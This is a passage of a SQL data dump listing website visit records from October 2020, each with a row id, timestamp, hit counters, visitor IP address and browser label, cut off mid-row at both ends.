'173.252.83.11','other'),(540439,1602620623,1,1,0,0,'31.13.103.18','other'),(540440,1602620624,1,1,0,0,'31.13.103.20','other'),(540441,1602621821,1,1,0,0,'31.13.127.119','other'),(540442,1602622136,1,1,0,0,'173.252.87.13','other'),(540443,1602624060,1,1,0,0,'31.13.127.12','other'),(540444,1602625061,1,1,0,0,'173.252.127.117','other'),(540445,1602626237,1,1,0,0,'31.13.103.18','other'),(540447,1602627796,1,0,1,0,'66.249.66.93',''),(540448,1602629253,1,1,0,0,'130.180.211.59','chrome'),(540449,1602649266,1,1,0,0,'178.133.105.30','chrome'),(540450,1602649759,1,1,0,0,'31.13.103.6','other'),(540451,1602652591,1,1,0,0,'173.252.83.16','other'),(540452,1602653602,1,1,0,0,'31.13.127.23','other'),(540453,1602654454,1,1,0,0,'91.196.178.25','chrome'),(540454,1602655066,1,1,0,0,'66.220.149.112','other'),(540455,1602655237,1,1,0,0,'173.252.95.10','other'),(540456,1602655355,1,1,0,0,'91.196.178.25','chrome'),(540457,1602656302,1,1,0,0,'91.196.178.25','chrome'),(540458,1602656705,1,1,0,0,'31.13.127.10','other'),(540459,1602656706,1,1,0,0,'31.13.127.116','other'),(540461,1602656707,1,1,0,0,'31.13.127.14','other'),(540462,1602656709,1,1,0,0,'31.13.127.16','other'),(540464,1602656710,2,2,0,0,'31.13.127.13','other'),(540465,1602656711,1,1,0,0,'31.13.127.118','other'),(540471,1602656713,2,2,0,0,'31.13.127.18','other'),(540474,1602656715,1,1,0,0,'31.13.127.111','other'),(540475,1602656751,1,1,0,0,'95.134.116.249','chrome'),(540476,1602656774,1,1,0,0,'173.252.87.10','other'),(540477,1602656814,1,1,0,0,'46.211.69.173','chrome'),(540478,1602656970,1,1,0,0,'176.118.49.10','chrome'),(540479,1602657400,1,1,0,0,'91.196.178.25','chrome'),(540480,1602657479,1,1,0,0,'31.13.127.120','other'),(540481,1602657660,1,1,0,0,'173.252.95.24','other'),(540482,1602657915,1,1,0,0,'128.124.224.137','chrome'),(540483,1602657958,1,1,0,0,'31.13.127.2','other'),(540484,1602657959,1,1,0,0,'31.13.127.24','other'),(540485,1602657968,1,1,0,0,'31.13.127.9','other'),(540486,1602657969,1,1,0,0,'31.13.127.119','other'),(540487,1602657982,1,1,0,0,'128.124.136.187','chrome'),(540488,1602658154,1,1,0,0,'91.196.178.56','chrome'),(540489,1602658410,1,1,0,0,'173.252.95.23','other'),(540490,1602658485,1,1,0,0,'66.220.149.14','other'),(540491,1602658891,1,1,0,0,'91.196.178.25','chrome'),(540492,1602659453,1,1,0,0,'178.251.109.241','chrome'),(540493,1602659454,1,1,0,0,'31.13.127.12','other'),(540494,1602659455,1,1,0,0,'31.13.127.117','other'),(540495,1602659472,1,1,0,0,'69.171.251.113','other'),(540496,1602660288,1,1,0,0,'46.211.32.133','chrome'),(540497,1602660495,1,1,0,0,'66.220.149.116','other'),(540498,1602660540,1,1,0,0,'173.252.127.16','other'),(540499,1602661112,1,1,0,0,'128.124.203.157','chrome'),(540500,1602661292,1,1,0,0,'31.13.103.10','other'),(540501,1602661293,1,1,0,0,'31.13.103.113','other'),(540502,1602661512,1,1,0,0,'91.196.178.25','chrome'),(540503,1602661904,1,1,0,0,'130.180.210.198','chrome'),(540504,1602662015,1,1,0,0,'31.13.127.14','other'),(540505,1602662021,1,1,0,0,'31.13.127.11','other'),(540506,1602662470,1,1,0,0,'31.13.127.19','other'),(540507,1602662583,1,1,0,0,'173.252.95.11','other'),(540508,1602663911,1,1,0,0,'173.252.79.9','other'),(540509,1602665971,1,1,0,0,'94.153.32.117','chrome'),(540510,1602666307,1,1,0,0,'31.13.127.9','other'),(540511,1602668041,1,1,0,0,'31.13.127.7','other'),(540512,1602671033,1,1,0,0,'46.211.33.208','chrome'),(540513,1602671826,1,1,0,0,'91.196.178.25','chrome'),(540514,1602671992,1,1,0,0,'94.153.25.57','chrome'),(540515,1602672006,1,1,0,0,'176.121.5.54','chrome'),(540516,1602672534,1,1,0,0,'173.252.95.117','other'),(540517,1602673271,1,1,0,0,'91.196.178.25','chrome'),(540518,1602674207,2,2,0,0,'91.196.178.25','chrome'),(540519,1602674687,2,2,0,0,'31.13.127.19','other'),(540520,1602674689,1,1,0,0,'31.13.127.14','other'),(540521,1602674691,2,2,0,0,'31.13.127.113','other'),(540523,1602674695,1,1,0,0,'31.13.127.10','other'),(540524,1602674916,1,1,0,0,'173.252.127.33','other'),(540525,1602674967,1,1,0,0,'93.73.113.14','chrome'),(540526,1602674997,1,1,0,0,'31.13.127.13','other'),(540528,1602674998,1,1,0,0,'31.13.127.120','other'),(540529,1602674999,1,1,0,0,'31.13.127.2','other'),(540530,1602675281,1,1,0,0,'173.252.95.5','other'),(540531,1602675372,1,1,0,0,'91.196.178.25','chrome'),(540532,1602675717,1,1,0,0,'185.237.217.7','firefox'),(540533,1602675719,2,2,0,0,'31.13.127.116','other'),(540534,1602676537,1,1,0,0,'91.196.178.73','chrome'),(540535,1602676591,1,1,0,0,'31.13.127.13','other'),(540536,1602676592,1,1,0,0,'31.13.127.8','other'),(540537,1602677014,1,1,0,0,'91.196.178.189','chrome'),(540538,1602677346,1,1,0,0,'173.252.95.11','other'),(540539,1602680835,1,1,0,0,'46.211.60.56','chrome'),(540540,1602682219,1,1,0,0,'173.252.127.36','other'),(540541,1602682221,1,1,0,0,'173.252.83.113','other'),(540542,1602685891,1,1,0,0,'188.163.32.24','chrome'),(540543,1602685944,1,1,0,0,'31.13.127.12','other'),(540544,1602685945,1,1,0,0,'31.13.127.21','other'),(540545,1602687228,1,1,0,0,'69.171.251.17','other'),(540546,1602692855,2,2,0,0,'91.196.178.25','chrome'),(540547,1602694407,1,1,0,0,'173.252.95.2','other'),(540548,1602694420,1,1,0,0,'91.196.178.146','other'),(540549,1602694436,1,1,0,0,'31.13.127.22','other'),(540550,1602694438,1,1,0,0,'31.13.127.12','other'),(540551,1602695463,1,1,0,0,'209.17.96.146','other'),(540552,1602695644,2,2,0,0,'91.196.178.25','chrome'),(540553,1602695942,1,1,0,0,'31.13.127.4','other'),(540555,1602695943,1,1,0,0,'31.13.127.7','other'),(540558,1602695945,1,1,0,0,'31.13.127.10','other'),(540560,1602695946,2,2,0,0,'31.13.127.18','other'),(540562,1602696004,2,2,0,0,'173.252.111.23','other'),(540564,1602696012,2,2,0,0,'173.252.95.5','other'),(540565,1602696081,2,2,0,0,'91.196.178.56','chrome'),(540566,1602696083,1,1,0,0,'92.113.188.243','chrome'),(540567,1602696148,1,1,0,0,'94.153.10.203','chrome'),(540568,1602696161,1,1,0,0,'91.196.178.109','chrome'),(540569,1602696177,1,1,0,0,'46.211.68.112','chrome'),(540570,1602696182,1,1,0,0,'37.53.110.49','chrome'),(540571,1602696234,1,1,0,0,'91.196.178.33','chrome'),(540572,1602696359,1,1,0,0,'31.13.127.26','other'),(540573,1602696360,1,1,0,0,'31.13.127.11','other'),(540574,1602696433,1,1,0,0,'91.196.178.176','chrome'),(540575,1602696466,1,1,0,0,'66.220.149.13','other'),(540576,1602696476,1,1,0,0,'91.196.178.172','chrome'),(540577,1602696489,1,1,0,0,'91.196.178.166','other'),(540578,1602696664,1,1,0,0,'176.37.41.208','chrome'),(540579,1602696704,1,1,0,0,'31.13.127.9','other'),(540580,1602696705,1,1,0,0,'31.13.127.6','other'),(540581,1602696762,1,1,0,0,'185.237.217.15','chrome'),(540582,1602697018,1,1,0,0,'91.196.178.154','chrome'),(540583,1602697096,1,1,0,0,'91.196.178.186','chrome'),(540584,1602697106,2,2,0,0,'195.10.210.70','chrome'),(540585,1602697111,1,1,0,0,'91.196.178.59','chrome'),(540586,1602697356,1,1,0,0,'185.237.217.20','chrome'),(540587,1602697487,1,1,0,0,'37.52.22.24','chrome'),(540588,1602697489,1,1,0,0,'31.13.127.24','other'),(540589,1602697600,2,2,0,0,'91.196.178.114','chrome'),(540590,1602697656,1,1,0,0,'91.196.178.153','chrome'),(540591,1602697672,1,1,0,0,'173.252.95.16','other'),(540592,1602697728,1,1,0,0,'195.10.210.210','chrome'),(540593,1602697939,1,1,0,0,'173.252.83.13','other'),(540594,1602697993,1,1,0,0,'91.196.178.125','chrome'),(540595,1602698138,1,1,0,0,'91.196.178.37','chrome'),(540596,1602698174,1,1,0,0,'37.73.145.189','chrome'),(540597,1602698218,1,1,0,0,'91.196.178.91','chrome'),(540598,1602698262,1,1,0,0,'91.196.178.121','chrome'),(540599,1602698287,1,1,0,0,'173.252.111.120','other'),(540600,1602698291,1,1,0,0,'66.220.149.23','other'),(540601,1602698435,1,1,0,0,'91.196.178.170','chrome'),(540602,1602698465,1,1,0,0,'91.196.178.48','chrome'),(540603,1602698546,1,1,0,0,'173.252.95.22','other'),(540604,1602698605,1,1,0,0,'91.196.178.163','chrome'),(540605,1602698653,1,1,0,0,'91.196.178.30','chrome'),(540606,1602698693,1,1,0,0,'173.252.87.119','other'),(540607,1602698707,1,1,0,0,'91.196.178.82','chrome'),(540608,1602698724,1,1,0,0,'91.196.178.139','chrome'),(540609,1602698740,1,1,0,0,'94.153.32.229','chrome'),(540610,1602698863,1,1,0,0,'91.196.178.175','chrome'),(540611,1602698890,1,1,0,0,'91.196.178.154','chrome'),(540612,1602699094,1,1,0,0,'92.113.127.239','chrome'),(540613,1602699130,1,1,0,0,'31.13.127.7','other'),(540615,1602699131,1,1,0,0,'69.171.251.119','other'),(540616,1602699161,1,1,0,0,'91.196.178.25','chrome'),(540617,1602699204,1,1,0,0,'91.196.178.112','chrome'),(540618,1602699319,1,1,0,0,'195.10.210.49','chrome'),(540619,1602699387,1,1,0,0,'37.73.118.43','chrome'),(540620,1602699393,1,1,0,0,'91.196.178.178','chrome'),(540621,1602699642,1,1,0,0,'91.196.178.170','chrome'),(540622,1602699725,1,1,0,0,'128.124.100.213','chrome'),(540623,1602699730,1,1,0,0,'46.211.80.15','chrome'),(540624,1602699914,1,1,0,0,'88.155.103.183','chrome'),(540625,1602699939,1,1,0,0,'91.196.178.18','chrome'),(540626,1602700162,1,1,0,0,'91.196.178.25','chrome'),(540627,1602700559,1,1,0,0,'69.171.251.4','other'),(540628,1602700702,1,1,0,0,'185.237.217.11','chrome'),(540629,1602700738,1,1,0,0,'173.252.83.16','other'),(540630,1602700740,1,1,0,0,'173.252.83.1','other'),(540631,1602700916,1,1,0,0,'37.73.112.39','chrome'),(540632,1602700917,1,1,0,0,'91.196.178.161','chrome'),(540633,1602701003,1,1,0,0,'178.133.161.105','chrome'),(540634,1602701135,1,1,0,0,'91.196.178.61','chrome'),(540635,1602701380,1,1,0,0,'173.252.127.9','other'),(540636,1602701483,1,1,0,0,'79.110.137.67','chrome'),(540637,1602702276,1,1,0,0,'173.252.111.119','other'),(540638,1602702359,1,1,0,0,'91.196.178.17','chrome'),(540639,1602702442,1,1,0,0,'46.133.107.171','chrome'),(540640,1602702613,1,1,0,0,'185.11.29.223','other'),(540641,1602702648,1,1,0,0,'173.252.95.13','other'),(540642,1602702743,1,1,0,0,'91.196.178.152','chrome'),(540643,1602703298,1,1,0,0,'77.75.145.67','chrome'),(540644,1602703332,1,1,0,0,'173.252.111.120','other'),(540645,1602703623,1,1,0,0,'173.252.87.3','other'),(540646,1602703698,1,1,0,0,'66.220.149.38','other'),(540647,1602704121,1,1,0,0,'37.57.248.132','chrome'),(540648,1602704579,1,1,0,0,'91.196.178.58','chrome'),(540649,1602704998,1,1,0,0,'173.252.127.30','other'),(540650,1602705097,1,1,0,0,'31.13.127.7','other'),(540651,1602705756,1,1,0,0,'91.196.178.177','chrome'),(540652,1602705763,1,1,0,0,'173.252.83.19','other'),(540653,1602705766,1,1,0,0,'173.252.83.2','other'),(540654,1602705827,1,1,0,0,'91.196.178.183','chrome'),(540655,1602705846,1,1,0,0,'195.10.210.210','chrome'),(540656,1602706086,1,1,0,0,'173.252.127.15','other'),(540657,1602706346,1,1,0,0,'46.211.45.80','chrome'),(540658,1602706727,1,1,0,0,'91.196.178.103','chrome'),(540659,1602706775,1,1,0,0,'91.196.178.94','chrome'),(540660,1602706833,1,1,0,0,'31.13.127.19','other'),(540661,1602706916,1,1,0,0,'46.211.23.213','chrome'),(540662,1602707231,1,1,0,0,'91.196.178.142','chrome'),(540663,1602707555,1,1,0,0,'193.107.132.208','other'),(540664,1602707745,1,1,0,0,'46.211.47.103','other'),(540665,1602707978,1,1,0,0,'91.196.178.30','chrome'),(540666,1602708896,1,1,0,0,'195.10.210.210','chrome'),(540667,1602709015,1,1,0,0,'94.153.9.149','chrome'),(540668,1602709113,1,1,0,0,'178.92.84.232','chrome'),(540669,1602709725,1,1,0,0,'31.13.127.5','other'),(540670,1602709726,1,1,0,0,'31.13.127.14','other'),(540671,1602710039,1,1,0,0,'178.92.84.232','chrome'),(540672,1602710094,1,1,0,0,'31.13.127.15','other'),(540673,1602710200,1,1,0,0,'66.220.149.36','other'),(540674,1602710202,1,1,0,0,'66.220.149.19','other'),(540675,1602710292,1,1,0,0,'173.252.127.17','other'),(540676,1602710417,1,1,0,0,'94.153.72.6','chrome'),(540677,1602710931,1,1,0,0,'66.220.149.22','other'),(540678,1602710937,1,1,0,0,'66.220.149.34','other'),(540679,1602711530,1,1,0,0,'130.180.209.143','chrome'),(540680,1602712408,1,1,0,0,'45.93.9.209','chrome'),(540681,1602713299,1,0,1,0,'66.249.66.92',''),(540682,1602718605,1,1,0,0,'173.252.95.113','other'),(540683,1602721097,1,1,0,0,'31.13.115.10','other'),(540684,1602721099,2,2,0,0,'31.13.115.3','other'),(540685,1602721100,2,2,0,0,'31.13.115.14','other'),(540687,1602721101,1,1,0,0,'31.13.115.12','other'),(540688,1602721161,1,1,0,0,'91.196.178.56','chrome'),(540689,1602721927,1,1,0,0,'185.237.217.22','chrome'),(540690,1602728176,1,1,0,0,'185.11.29.223','other'),(540691,1602730829,1,1,0,0,'91.196.178.137','chrome'),(540692,1602731320,1,1,0,0,'173.252.127.116','other'),(540693,1602732596,1,1,0,0,'173.252.87.4','other'),(540694,1602732703,1,1,0,0,'46.211.70.51','chrome'),(540695,1602732707,1,1,0,0,'46.211.58.223','chrome'),(540696,1602733140,1,1,0,0,'173.252.87.28','other'),(540697,1602733273,1,1,0,0,'94.153.34.175','chrome'),(540698,1602733883,1,1,0,0,'188.163.18.105','other'),(540699,1602734197,1,1,0,0,'91.196.178.73','chrome'),(540700,1602734790,1,1,0,0,'46.211.34.140','chrome'),(540701,1602734890,1,1,0,0,'46.211.20.172','other'),(540702,1602735650,1,1,0,0,'46.211.69.237','chrome'),(540703,1602735862,2,2,0,0,'31.13.103.11','other'),(540704,1602735970,1,1,0,0,'46.211.19.128','chrome'),(540705,1602736290,1,1,0,0,'128.124.157.240','chrome'),(540706,1602736306,1,1,0,0,'185.237.217.17','chrome'),(540707,1602736819,1,1,0,0,'91.196.178.119','chrome'),(540708,1602736838,1,1,0,0,'37.73.155.189','chrome'),(540709,1602737817,1,1,0,0,'46.133.213.176','chrome'),(540710,1602737982,1,1,0,0,'95.158.42.61','other'),(540711,1602738142,1,1,0,0,'91.196.178.13','chrome'),(540712,1602738653,2,2,0,0,'31.13.127.116','other'),(540713,1602738740,1,1,0,0,'46.211.77.85','chrome'),(540714,1602738746,1,1,0,0,'31.13.127.23','other'),(540715,1602738747,1,1,0,0,'31.13.127.21','other'),(540716,1602739008,1,1,0,0,'94.153.34.161','chrome'),(540717,1602739159,1,1,0,0,'31.13.127.7','other'),(540718,1602739951,1,1,0,0,'173.252.83.21','other'),(540719,1602739952,1,1,0,0,'173.252.127.17','other'),(540720,1602739953,1,1,0,0,'173.252.127.8','other'),(540721,1602740080,1,1,0,0,'66.220.149.16','other'),(540722,1602740092,1,1,0,0,'31.13.127.112','other'),(540723,1602740397,1,1,0,0,'66.220.149.6','other'),(540724,1602740520,1,1,0,0,'88.155.130.106','chrome'),(540725,1602740810,1,1,0,0,'128.124.137.1','chrome'),(540726,1602740879,1,1,0,0,'31.13.127.12','other'),(540727,1602740880,1,1,0,0,'31.13.127.10','other'),(540728,1602740882,1,1,0,0,'31.13.127.5','other'),(540729,1602741643,1,1,0,0,'185.237.217.7','firefox'),(540730,1602742783,1,1,0,0,'91.196.178.22','chrome'),(540731,1602743146,1,1,0,0,'194.126.181.165','chrome'),(540732,1602743230,1,1,0,0,'92.113.191.53','chrome'),(540733,1602743320,1,1,0,0,'31.13.127.117','other'),(540734,1602743322,1,1,0,0,'31.13.127.3','other'),(540735,1602743597,1,1,0,0,'91.196.178.123','chrome'),(540736,1602743743,1,1,0,0,'31.13.127.2','other'),(540737,1602743744,1,1,0,0,'31.13.127.1','other'),(540738,1602744236,1,1,0,0,'46.211.3.100','chrome'),(540739,1602744677,1,1,0,0,'46.211.34.219','chrome'),(540740,1602744743,1,1,0,0,'31.13.127.4','other'),(540741,1602744744,1,1,0,0,'31.13.127.12','other'),(540742,1602744911,1,1,0,0,'94.153.50.204','chrome'),(540743,1602746576,1,1,0,0,'88.155.2.70','other'),(540744,1602746620,1,1,0,0,'31.13.127.14','other'),(540745,1602746621,1,1,0,0,'31.13.127.7','other'),(540746,1602746717,1,1,0,0,'69.171.251.2','other'),(540747,1602746718,1,1,0,0,'69.171.251.27','other'),(540750,1602746929,1,1,0,0,'128.124.137.1','chrome'),(540751,1602746937,1,1,0,0,'31.13.127.6','other'),(540752,1602746938,1,1,0,0,'31.13.127.15','other'),(540753,1602748709,1,1,0,0,'46.203.69.252','chrome'),(540754,1602748727,1,1,0,0,'173.252.79.4','other'),(540755,1602748842,1,1,0,0,'31.13.127.12','other'),(540756,1602748844,1,1,0,0,'31.13.127.111','other'),(540757,1602749134,1,1,0,0,'185.160.60.21','chrome'),(540758,1602749790,1,1,0,0,'91.196.178.56','chrome'),(540759,1602750418,1,1,0,0,'46.211.39.20','chrome'),(540760,1602750488,1,1,0,0,'66.220.149.10','other'),(540761,1602751377,1,1,0,0,'95.134.112.50','chrome'),(540762,1602751631,1,1,0,0,'173.252.127.1','other'),(540763,1602753061,1,1,0,0,'37.73.94.136','chrome'),(540764,1602753211,1,1,0,0,'46.211.54.85','other'),(540765,1602753257,1,1,0,0,'31.13.127.5','other'),(540766,1602753258,1,1,0,0,'31.13.127.14','other'),(540767,1602753364,2,2,0,0,'91.196.178.29','chrome'),(540768,1602753747,1,1,0,0,'31.13.127.21','other'),(540769,1602753748,2,2,0,0,'31.13.127.9','other'),(540770,1602754179,2,2,0,0,'91.196.178.61','chrome'),(540771,1602754232,1,1,0,0,'31.13.127.6','other'),(540772,1602754233,1,1,0,0,'31.13.127.111','other'),(540773,1602754524,1,1,0,0,'91.196.178.29','chrome'),(540774,1602754527,2,2,0,0,'31.13.127.119','other'),(540775,1602754528,1,1,0,0,'31.13.127.14','other'),(540776,1602754529,1,1,0,0,'31.13.127.8','other'),(540777,1602754530,1,1,0,0,'31.13.127.16','other'),(540778,1602754541,1,1,0,0,'31.13.127.22','other'),(540779,1602754586,1,1,0,0,'31.13.127.116','other'),(540780,1602754587,1,1,0,0,'31.13.127.18','other'),(540782,1602754588,1,1,0,0,'173.252.95.15','other'),(540783,1602754849,1,1,0,0,'66.249.92.157','other'),(540784,1602755255,1,1,0,0,'31.13.127.21','other'),(540785,1602755256,1,1,0,0,'31.13.127.23','other'),(540786,1602755436,1,1,0,0,'91.196.178.29','chrome'),(540787,1602755564,1,1,0,0,'31.13.127.5','other'),(540789,1602756298,1,1,0,0,'91.196.178.117','chrome'),(540790,1602756368,1,1,0,0,'91.196.178.114','chrome'),(540791,1602756392,1,1,0,0,'173.252.95.14','other'),(540792,1602757284,1,1,0,0,'91.196.178.29','chrome'),(540793,1602758742,1,1,0,0,'37.115.65.129','chrome'),(540794,1602758886,1,1,0,0,'31.13.127.22','other'),(540795,1602758887,1,1,0,0,'31.13.127.9','other'),(540796,1602759546,1,1,0,0,'69.171.251.5','other'),(540797,1602760051,1,1,0,0,'173.252.87.26','other'),(540798,1602761221,1,1,0,0,'62.80.160.205','chrome'),(540799,1602761776,1,1,0,0,'91.196.178.131','other'),(540800,1602761882,1,1,0,0,'46.211.74.179','chrome'),(540801,1602762097,1,1,0,0,'31.13.127.12','other'),(540802,1602762099,1,1,0,0,'31.13.127.21','other'),(540803,1602762804,1,1,0,0,'91.196.177.69','chrome'),(540804,1602762858,1,1,0,0,'91.196.178.33','chrome'),(540805,1602763039,1,1,0,0,'31.13.127.3','other'),(540806,1602763040,1,1,0,0,'31.13.127.16','other'),(540807,1602763407,1,1,0,0,'46.201.135.237','chrome'),(540808,1602763475,1,1,0,0,'31.13.127.118','other'),(540810,1602763977,1,1,0,0,'173.252.95.111','other'),(540811,1602763978,1,1,0,0,'173.252.95.28','other'),(540812,1602763979,1,1,0,0,'173.252.95.26','other'),(540813,1602764027,1,1,0,0,'46.211.64.57','chrome'),(540814,1602764774,1,1,0,0,'64.246.161.190','firefox'),(540815,1602765269,1,1,0,0,'91.196.178.171','other'),(540816,1602765915,1,1,0,0,'92.112.225.50','firefox'),(540817,1602766216,1,1,0,0,'31.13.127.4','other'),(540818,1602766217,1,1,0,0,'31.13.127.21','other'),(540819,1602767155,1,1,0,0,'91.196.179.65','chrome'),(540820,1602769071,1,1,0,0,'173.252.95.23','other'),(540821,1602769094,1,1,0,0,'31.13.127.21','other'),(540822,1602771965,1,1,0,0,'31.13.127.23','other'),(540823,1602772789,1,1,0,0,'173.252.83.113','other'),(540824,1602773107,1,1,0,0,'173.252.95.21','other'),(540825,1602773247,1,1,0,0,'213.180.203.111','other'),(540826,1602773609,1,1,0,0,'173.252.87.24','other'),(540827,1602773989,1,1,0,0,'91.196.178.25','chrome'),(540828,1602774094,1,1,0,0,'91.196.178.38','chrome'),(540829,1602774189,2,2,0,0,'31.13.127.9','other'),(540830,1602774192,1,1,0,0,'31.13.127.16','other'),(540831,1602774194,2,2,0,0,'31.13.127.119','other'),(540832,1602774201,2,2,0,0,'31.13.127.120','other'),(540833,1602774203,1,1,0,0,'31.13.127.10','other'),(540834,1602774206,1,1,0,0,'31.13.127.18','other'),(540835,1602774208,1,1,0,0,'31.13.127.30','other'),(540836,1602774230,1,1,0,0,'91.196.178.29','chrome'),(540837,1602774276,1,1,0,0,'31.13.127.118','other'),(540838,1602774638,1,1,0,0,'46.211.79.112','chrome'),(540839,1602774664,1,1,0,0,'173.252.107.11','other'),(540840,1602774702,1,1,0,0,'173.252.95.118','other'),(540841,1602774976,1,1,0,0,'37.73.196.175','chrome'),(540842,1602775007,1,1,0,0,'31.13.127.2','other'),(540843,1602775008,1,1,0,0,'31.13.127.19','other'),(540844,1602775386,1,1,0,0,'188.163.32.60','chrome'),(540845,1602775475,2,2,0,0,'31.13.127.13','other'),(540846,1602775643,2,2,0,0,'91.196.178.25','chrome'),(540847,1602775985,1,1,0,0,'91.196.178.109','chrome'),(540848,1602776001,1,1,0,0,'31.13.127.25','other'),(540850,1602776002,2,2,0,0,'31.13.127.12','other'),(540851,1602776027,1,1,0,0,'91.196.178.52','chrome'),(540852,1602776480,1,1,0,0,'31.13.127.7','other'),(540854,1602776761,1,1,0,0,'173.252.95.9','other'),(540855,1602776894,1,1,0,0,'91.196.178.38','chrome'),(540856,1602777371,4,4,0,0,'91.196.178.25','chrome'),(540857,1602777548,1,1,0,0,'212.113.42.253','chrome'),(540858,1602777951,1,1,0,0,'31.13.127.27','other'),(540859,1602777952,1,1,0,0,'31.13.127.3','other'),(540860,1602777970,1,1,0,0,'94.153.0.5','chrome'),(540861,1602778292,1,1,0,0,'185.237.217.22','chrome'),(540862,1602778692,1,1,0,0,'31.13.127.15','other'),(540865,1602778693,1,1,0,0,'31.13.127.6','other'),(540866,1602778695,1,1,0,0,'31.13.127.24','other'),(540867,1602778705,1,1,0,0,'91.196.178.25','chrome'),(540868,1602778799,1,1,0,0,'91.196.178.106','chrome'),(540869,1602778800,1,1,0,0,'69.171.251.117','other'),(540870,1602778834,1,1,0,0,'37.73.196.175','chrome'),(540871,1602778973,1,1,0,0,'31.60.242.78','chrome'),(540872,1602779011,1,1,0,0,'31.13.127.10','other'),(540873,1602779012,1,1,0,0,'31.13.127.23','other'),(540874,1602779083,1,1,0,0,'91.196.178.161','other'),(540875,1602779106,1,1,0,0,'91.196.178.37','chrome'),(540876,1602779244,1,1,0,0,'91.196.178.75','chrome'),(540877,1602779348,1,1,0,0,'31.13.127.25','other'),(540879,1602779620,2,2,0,0,'91.196.178.25','chrome'),(540880,1602779880,1,1,0,0,'91.196.177.26','chrome'),(540881,1602780020,1,1,0,0,'185.237.217.8','chrome'),(540882,1602780138,1,1,0,0,'173.252.111.2','other'),(540883,1602780139,1,1,0,0,'173.252.111.18','other'),(540884,1602780191,1,1,0,0,'66.220.149.31','other'),(540885,1602780192,1,1,0,0,'173.252.95.10','other'),(540886,1602780511,1,1,0,0,'31.13.127.2','other'),(540887,1602780512,1,1,0,0,'31.13.127.22','other'),(540888,1602780538,1,1,0,0,'91.196.178.25','chrome'),(540889,1602782166,1,1,0,0,'185.53.79.241','chrome'),(540890,1602782171,1,1,0,0,'185.53.79.242','chrome'),(540891,1602783161,1,1,0,0,'91.196.178.29','chrome'),(540892,1602783215,1,1,0,0,'31.13.127.118','other'),(540894,1602783216,1,1,0,0,'31.13.127.7','other'),(540895,1602783432,1,1,0,0,'66.220.149.23','other'),(540896,1602783543,1,1,0,0,'66.220.149.12','other'),(540897,1602785808,1,1,0,0,'185.237.217.5','other'),(540898,1602786040,1,1,0,0,'195.10.210.70','chrome'),(540899,1602786338,1,1,0,0,'31.13.127.4','other'),(540900,1602786451,2,2,0,0,'173.252.111.1','other'),(540901,1602786574,1,1,0,0,'46.201.174.114','chrome'),(540902,1602786644,1,1,0,0,'91.196.178.109','chrome'),(540903,1602787507,1,1,0,0,'178.92.249.185','chrome'),(540904,1602788058,1,1,0,0,'5.255.253.92','other'),(540905,1602788427,1,1,0,0,'5.255.253.87','other'),(540906,1602788807,1,1,0,0,'91.196.178.184','chrome'),(540907,1602789029,1,1,0,0,'66.220.149.10','other'),(540908,1602789031,1,1,0,0,'66.220.149.34','other'),(540909,1602789915,1,1,0,0,'173.252.127.1','other'),(540910,1602789997,1,1,0,0,'91.196.178.59','chrome'),(540911,1602790000,1,1,0,0,'66.220.149.30','other'),(540912,1602790002,1,1,0,0,'66.220.149.17','other'),(540913,1602790073,1,1,0,0,'91.196.178.25','chrome'),(540914,1602790199,1,1,0,0,'173.252.111.2','other'),(540915,1602790203,1,1,0,0,'173.252.111.118','other'),(540916,1602790207,1,1,0,0,'46.133.69.105','chrome'),(540917,1602790346,1,1,0,0,'91.196.178.177','chrome'),(540918,1602790368,1,1,0,0,'46.211.81.212','chrome'),(540919,1602790501,1,1,0,0,'66.220.149.38','other'),(540920,1602790504,1,1,0,0,'66.220.149.29','other'),(540921,1602790700,1,1,0,0,'93.73.113.14','chrome'),(540922,1602790843,1,1,0,0,'178.92.249.195','chrome'),(540923,1602790908,1,1,0,0,'195.10.210.210','chrome'),(540924,1602791028,1,1,0,0,'91.196.178.187','chrome'),(540925,1602791283,1,1,0,0,'91.196.178.12','chrome'),(540926,1602791602,1,1,0,0,'91.196.178.61','chrome'),(540927,1602791829,1,1,0,0,'195.10.210.49','chrome'),(540928,1602791982,1,1,0,0,'173.252.83.4','other'),(540929,1602791984,1,1,0,0,'173.252.83.18','other'),(540930,1602792029,1,1,0,0,'173.252.87.30','other'),(540931,1602792589,1,1,0,0,'91.196.178.25','chrome'),(540932,1602793618,1,1,0,0,'91.196.178.25','chrome'),(540933,1602794095,1,1,0,0,'37.73.19.118','chrome'),(540934,1602794313,1,1,0,0,'173.252.87.120','other'),(540935,1602794606,2,2,0,0,'69.171.251.17','other'),(540936,1602794607,1,1,0,0,'69.171.251.9','other'),(540937,1602794729,1,1,0,0,'91.196.178.165','chrome'),(540938,1602797836,1,1,0,0,'66.220.149.2','other'),(540939,1602797976,1,1,0,0,'66.220.149.12','other'),(540940,1602798057,1,1,0,0,'185.237.217.19','other'),(540941,1602798341,1,1,0,0,'128.124.69.160','chrome'),(540942,1602798477,1,1,0,0,'66.220.149.23','other'),(540943,1602798843,1,0,1,0,'66.249.66.92',''),(540944,1602803225,1,1,0,0,'66.220.149.22','other'),(540945,1602803233,1,1,0,0,'66.220.149.20','other'),(540946,1602803234,1,1,0,0,'66.220.149.6','other'),(540947,1602806196,1,1,0,0,'188.146.176.46','chrome'),(540948,1602806881,1,1,0,0,'91.196.178.180','chrome'),(540949,1602807668,2,2,0,0,'31.13.115.23','other'),(540951,1602807669,1,1,0,0,'31.13.115.24','other'),(540955,1602808897,1,1,0,0,'173.252.95.14','other'),(540956,1602808898,1,1,0,0,'173.252.95.9','other'),(540957,1602809809,1,1,0,0,'146.0.82.36','other'),(540958,1602814959,1,1,0,0,'37.73.134.65','chrome'),(540959,1602816983,1,1,0,0,'173.252.127.8','other'),(540960,1602817162,1,1,0,0,'5.255.231.133','other'),(540961,1602817173,1,1,0,0,'213.180.203.111','other'),(540962,1602817485,1,1,0,0,'31.13.103.15','other'),(540963,1602818466,1,1,0,0,'46.211.16.53','chrome'),(540964,1602818484,1,1,0,0,'185.237.217.9','chrome'),(540965,1602818629,1,1,0,0,'31.13.103.118','other'),(540967,1602818791,1,1,0,0,'31.13.115.119','other'),(540968,1602818792,1,1,0,0,'31.13.103.5','other'),(540969,1602819035,1,1,0,0,'91.196.178.25','chrome'),(540970,1602819116,1,1,0,0,'66.220.149.119','other'),(540971,1602819216,1,1,0,0,'91.196.178.29','chrome'),(540972,1602819573,1,1,0,0,'91.196.178.61','chrome'),(540973,1602819924,1,1,0,0,'217.115.247.33','chrome'),(540974,1602821007,1,1,0,0,'5.255.253.92','other'),(540975,1602821236,1,1,0,0,'88.155.162.103','chrome'),(540976,1602821662,1,1,0,0,'91.196.178.